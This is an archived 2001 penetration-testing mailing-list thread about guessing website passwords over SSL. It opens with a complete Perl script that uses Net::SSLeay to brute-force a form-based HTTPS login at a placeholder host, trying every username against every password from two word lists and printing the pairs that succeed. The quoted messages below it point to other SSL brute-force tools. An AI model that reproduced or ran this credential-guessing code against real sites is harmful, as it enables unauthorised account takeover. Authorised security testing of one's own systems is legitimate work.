It's done very simply by using Perl's Net::SSLeay, something like this. Just an example:

    #!/usr/local/bin/perl
    use Net::SSLeay qw(post_https make_form);

    open(USR, "< users.txt")  || die "Unable to open users file.\n";
    open(PWD, "< passwd.txt") || die "Unable to open passwd file.\n";

    # read the password list once, stripping the trailing newline
    while (<PWD>) { chop; $passwd[@passwd] = $_ }
    close(PWD);

    # one login name per line; chop the newline once per user, not per password
    while (<USR>) {
        chop;
        foreach $pwd (@passwd) {
            ($page, $result, %headers) = post_https('www.victim.com', 443, '/login.cgi', '',
                                                    make_form('login' => $_, 'password' => $pwd));
            if ($page =~ "Login Successful") { print "$_:$pwd was correct\n" }
        }
    }
    close(USR);

On Tue, 17 Apr 2001, Batten, Gerald wrote:

> I'm not trying to crack the SSL session itself. I'm just trying to get an
> idea of the quality of passwords the users are using for that site, but from
> an external test only.
>
> The web server is not using the typical 'username/password' pop-up box,
> they're using a dynamically generated form, which has a different URL every
> time the page is brought up. The user enters their userid and password in
> the form and clicks on 'submit' which uses the HTTP POST method. The
> session is SSL-encrypted as well. The difficulty I am having is that short
> of writing my own perl script (which I am desperately trying to avoid...
> sorry, I don't like coding any more), none of the tools I have found can
> brute-force a form-based login over SSL. I tried using sslproxy and stunnel
> on NT/2000, but those ports lack some of the functionality I need. My next
> step is to try and convince one of my Linux co-workers to run stunnel on
> their system.
>
> Gerald.
>
> Note: Views expressed in this e-mail do not necessarily represent those of
> my employer.
> Note: Views expressed in this e-mail are not necessarily mine either.
>
> -----Original Message-----
> From: John R. Sciandra [mailto:johnrsat_private]
> Sent: Tuesday, April 17, 2001 1:37 PM
> To: PEN-TESTat_private
> Subject: Re: Web site password guessing over SSL
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Ok, don't flame me for being a bonehead, but let me pose a counter
> question or two.
>
> I was under the impression that (typically) SSL is run in a mode that
> only encrypts the transport between the client and server. I think it
> is possible to use SSL to restrict access to the web server by userid
> in some modes, but that generally is not how SSL is set up.
>
> If I understand correctly you are just trying to crack the web server's
> challenge. I think that what happens with cracking the web server's
> password is more of an end point dialog between the web server and the
> client. So if you can establish your SSL session (as if you were
> browsing the site) and are able to get the prompt for userid and
> password that the web server presents, you should be in business. Did
> I miss it? Do you have to do something extra with the SSL?
>
> If on the other hand you are trying to crack the actual SSL session
> itself... I am not sure, but doesn't that involve cracking RSA or
> something?
>
> - -John
>
> - -----Original Message-----
> From: Penetration Testers [mailto:PEN-TESTat_private]On Behalf
> Of Joel Brown
> Sent: Friday, April 13, 2001 10:52 AM
> To: PEN-TESTat_private
> Subject: Re: [PEN-TEST] Web site password guessing over SSL
>
>
> ssl.cracker.exe at
> http://neworder.box.sk/search.php3?srch=ssl+brute should work,
> also check out ObiWan at
> http://www.phenoelit.de/obiwan/
>
> Joel
>
> >>Our client wants us to try to brute-force one of their public web
> >>sites that
> >>is password-protected via a form-based login over SSL.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP for Personal Privacy 5.5.5
>
> iQA/AwUBOtx/NX0lZ+LOrv8nEQJYcgCfX66o15M5e6q5dKMIz9Wb89qOszYAoJVa
> 7wsHwn7aq3oCpCSE87BnrXXn
> =jTZ8
> -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 17:49:11 PDT